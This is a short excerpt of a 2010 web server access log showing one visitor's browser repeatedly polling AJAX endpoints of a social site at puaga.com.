88.235.89.20 - - [22/Feb/2010:04:24:15 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8288513204449532 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:24:17 -0800] "GET /musim/subbar/meonline.php?nocache=0.29082016050401216 HTTP/1.1" 200 5 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:24:17 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.341804396268963 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
88.235.89.20 - - [22/Feb/2010:04:24:18 -0800] "GET /musim/actions/listkiss_ajax.php?nocache=0.8993330149120593 HTTP/1.1" 200 19 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)" "www.puaga.com"
